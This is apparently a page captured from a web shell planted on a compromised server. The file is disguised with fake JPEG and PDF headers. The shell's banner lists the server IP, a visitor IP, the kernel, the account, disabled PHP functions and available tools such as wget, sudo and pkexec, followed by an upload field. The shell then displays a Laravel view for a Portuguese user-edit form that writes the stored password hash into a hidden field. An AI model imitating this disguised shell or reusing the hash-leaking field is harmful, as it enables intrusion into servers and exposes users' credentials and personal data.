ÿØÿà JFIF ÿþ; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 157.90.209.209 / Your IP : 216.73.216.129 [ Web Server : Apache System : Linux hcomm124.dns-wk.info 4.18.0-553.64.1.el8_10.x86_64 #1 SMP Mon Jul 28 12:01:56 EDT 2025 x86_64 User : evidenciarevista ( 1049) PHP Version : 7.2.34 Disable Function : exec,passthru,shell_exec,system Domains : 216 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /home/evidenciarevista/admin/storage/framework/views/ |
Upload File : |
<?php $__env->startSection('content'); ?> <section class="content-header"> <h1> <?php echo e($user->name); ?> <small>Alterar dados</small> </h1> </section> <!-- Main content --> <section class="content"> <div class="box box-success"> <div class="box-header"> <h3 class="box-title">Alterar dados</h3> </div> <div class="box-body"> <?php echo Form::open(['route' => ['users.update', $user->id] , 'method' => 'put', 'role' => 'form']); ?> <div class="col-lg-6"> <div class="form-group"> <?php echo Form::label('Nível do usuário:'); ?> <?php echo Form::select('nivel', ['2' => 'Funcionário', '1' => 'Administrador'], $user->nivel, ['class' => 'form-control']); ?> </div> <div class="form-group"> <label>Nome:</label> <input type="text" class="form-control" placeholder="Nome" name="name" required value="<?php echo e($user->name); ?>"> </div> <div class="form-group"> <label>Email:</label> <input type="email" class="form-control disabled" placeholder="E-mail" name="email" disabled value="<?php echo e($user->email); ?>"> </div> <div class="form-group"> <label>Função/Cargo:</label><br> <input type="text" class="form-control with-100" placeholder="Função" name="function" value="<?php echo e($user->function); ?>"> </div> <div class="form-group"> <label>Alterar password:</label> <input type="password" class="form-control" placeholder="Password" name="password"> </div> </div> <div class="col-lg-6"> <div class="form-group col-lg-6 col-md-6"> <label>CPF:</label><br> <input type="text" class="form-control with-100" placeholder="CPF" name="cpf" value="<?php echo e($user->cpf); ?>"> </div> <div class="form-group col-lg-6 col-md-6"> <label>RG:</label><br> <input type="text" class="form-control with-100" placeholder="RG" name="rg" value="<?php echo e($user->rg); ?>"> </div> <div class="form-group col-lg-6 col-md-6"> <label>Nascimento:</label><br> <input type="date" class="form-control with-100" placeholder="Nascimento" name="nasc" value="<?php echo e($user->nasc); ?>"> </div> <div class="form-group col-lg-6 col-md-6"> <?php echo Form::label('Sexo:'); ?><br> <?php echo Form::select('sexo', ['Masculino' => 'Masculino', 'Feminino' => 'Feminino'], $user->sexo, ['class' => 'form-control with-100']); ?> </div> <div class="form-group col-lg-6 col-md-6"> <label>Telefone:</label><br> <input type="text" class="form-control with-100" placeholder="Telefone" name="telefone" value="<?php echo e($user->telefone); ?>"> </div> <div class="form-group col-lg-6 col-md-6"> <label>Celular:</label><br> <input type="text" class="form-control with-100" placeholder="Celular" name="celular" value="<?php echo e($user->celular); ?>"> </div> <div class="form-group col-lg-12 col-md-12"> <label>Endereço:</label><br> <input type="text" class="form-control with-100" placeholder="Endereço" name="endereco" value="<?php echo e($user->endereco); ?>"> </div> </div> <div class="clearfix"></div> <div class="form-group col-lg-12"> <input type="hidden" name="old_password" value="<?php echo e($user->password); ?>"> <button type="submit" class="btn bg-purple"><i class="glyphicon glyphicon-refresh"></i> Salvar </button> </div> <?php echo Form::close(); ?> </div> <!-- /.box-body --> </div> <!-- /.box --> </section> <!-- /.content --> <?php $__env->stopSection(); ?> <?php echo $__env->make('master', array_except(get_defined_vars(), array('__data', '__path')))->render(); ?>